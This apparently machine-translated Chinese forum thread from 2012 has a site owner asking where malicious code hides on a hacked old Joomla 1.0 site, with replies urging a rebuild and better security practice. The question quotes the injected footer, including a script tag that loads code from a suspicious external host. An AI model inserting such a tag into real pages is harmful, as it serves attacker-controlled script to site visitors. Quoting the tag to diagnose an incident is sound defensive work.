我有一个旧的joomla 10.0.15被黑了一个星期前,我没有备份,因为我们正在计划迁移,但我需要知道发生了什么。修复权限后,重新安装所有核心文件,仍然有两个问题,第一个是仍然有恶意代码:Joomla网站被黑客入侵
<script src="http://www.google-analytics.com/urchin.js" type="text/javascript">
</script>
<script type="text/javascript">
_uacct ="UA-xxxxxxx-x";
urchinTracker();
</script>
<script src="http://equate22motorde.rr.nu/nl.php?p=d"></script>
</body>
与每一个重载的URL变化。我找不到代码在哪里。我检查了模板和其他文件,但没有。 ¿关于我可以在哪里查看的任何想法?
另一个问题是文件和文件夹访问,即使权限正常,这个joomla安装无法写入文件夹或修改任何文件。
在此先感谢。
试着问一个Joomla论坛。 – Steven 2012-03-27 15:01:04
请勿尝试修复原始网站。正如德文在下面提到的,你不能确定发生了什么变化,所以你永远不会知道你是否已经修好了一切。如果您没有备份,唯一安全的解决方案是在新的Joomla安装中重建网站并复制媒体,但不要复制您的代码。这是一个非常非常老版本的Joomla(3年以上)。寻求建议的最佳地点是在这里的J1.0安全论坛:http://bit.ly/HbDJUs – Trev 2012-03-27 16:58:01
尝试为您的joomla网站安装一些很好的安全扩展,定期检查访问日志,阻止重要的权限文件,只安装来自可靠来源的扩展,定期升级你的核心joomla源文件....这些是保护你的joomla网站的最低步骤。 – 2012-06-19 05:25:03